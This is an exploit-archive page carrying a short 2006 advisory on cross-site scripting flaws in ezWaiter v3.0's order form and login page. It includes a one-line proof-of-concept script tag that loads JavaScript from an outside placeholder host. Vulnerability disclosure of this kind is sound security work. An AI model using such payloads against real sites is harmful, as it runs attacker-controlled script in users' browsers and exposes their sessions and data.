ezWaiter30.txt

ezWaiter30.txt: Posted Jul 2, 2006; Authored by Luny; ezWaiter version 3.0 is susceptible to cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 2b095c8ba268fd981b548afbf804ff0ba9f2b678f69869d800766cd38d2bfe93; Download | Favorite | View

ezWaiter30.txt

ezWaiter v3.0

Homepage:
http://www.ezwaiter.com/

Affected files:

Placing an order
login.php
-------------------------------------------

XSS vuln when placing an order:

User input is not sanatized before being generated. For a PoC in the two boxes labeled
"Who is this item for?" and "Special Instructions:"

put:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

The login form found on login.php can be spoofed to remove the max char limits. It too doesn't sanatize data.

---------------------------------------

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 150 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

ezWaiter30.txt

ezWaiter30.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ezWaiter30.txt

Share This

ezWaiter30.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems